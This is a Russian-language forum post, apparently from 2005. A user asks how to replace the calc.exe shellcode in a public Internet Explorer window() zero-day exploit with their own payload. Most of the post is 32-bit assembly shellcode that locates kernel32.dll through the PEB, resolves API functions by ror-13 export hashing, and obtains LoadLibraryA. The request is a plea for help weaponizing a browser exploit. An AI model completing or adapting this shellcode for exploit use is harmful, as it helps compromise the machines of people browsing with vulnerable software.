Le@rner
Сообщений: 3
Оценки: 0
Присоединился: 2005-11-17 16:55:36
|
Господа, вот пытаюсь слегка отредактировать эксплоит IE windоw()
URL: http://www.frsirt.com/exploits/20051121.IEwindоw0day.php
Ихний шелл-код запускает calc.exe :)
У меня есть другой шел-код который я хочу запихнуть в эксплоит.
Знаю точно что он рабочий так как пробовал откомпилированый исходник на асме - работает.
Вот АСМ код:
[BITS 32]
global _start
_start:
call LKernel32Base
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
LKernel32Base:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
mov edi, eax
; ebx = kernel32.dll base
; esi = LGetProcAddress
; edi = LoadLibraryA
Подскажите, пожалуйста, что нужно подредактировать
С ассемблером знаком очень поверхносно.
|
Шелл-кодинг - 
